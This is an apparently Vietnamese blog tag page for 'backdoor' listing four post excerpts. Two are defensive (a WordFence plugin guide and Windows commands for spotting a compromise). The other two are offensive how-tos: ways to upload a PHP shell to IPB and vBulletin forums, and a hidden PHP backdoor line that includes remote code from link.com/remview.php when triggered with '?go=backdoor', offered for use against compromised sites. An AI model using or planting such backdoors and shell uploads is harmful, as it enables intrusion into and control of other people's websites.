Portfolio
backdoor

[WordPress] Hướng dẫn cài đặt và sử dụng plugin WordFence

October 9, 2017Category : Code/Web

WordFence là gì Wordfence là một plugin bảo mật WordFence. Và nó là plugin rất phổ biến. 2 triệu lượt cài đặt đã nói lên điều đó. Vậy plugin này có tính năng gì hay ho? Như là plugin bảo mật, đương nhiên nó sẽ giúp bảo vệ website của bạn trước các mối đe..

Read more
01.

Xác định hệ thống bị tấn công bằng các lệnh Windows

September 23, 2011Category : IT & Network

Các máy tính Windows là những máy tính bị tấn công nhiều nhất. Chính vì vậy mà Microsoft đã xây dựng rất nhiều công cụ trong hệ điều hành Windows để các quản trị viên và một số người dùng có thể phân tích máy tính của họ .1. WMIC Windows Management Instrumentation Command-line (WMIC)..

Read more
02.

Up shell ở IPB, VBB

June 10, 2008Category : Bug & Security

+IPB:Thằng này hiện tại tớ có 3 cách up shell Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần Emoticons rồi cứ up con shell php lên là được. Tuy nhiên cách này có hạn chế là đối với các ver >=2.1.7 ko làm được bới vì nó check..

Read more
03.

Ẩn backdoor, shell

June 10, 2008Category : Bug & Security

Dùng include if ($_REQUEST[‘go’]==”backdoor”) { include (“http://link.com/remview.php”); } hehe ! vậy khi nào cần dùng đến site này ta chỉ việc type lên file index.php của nó là : index.php?go=backdoor

Read more
04.
© Oliver / All rights reserved.
To top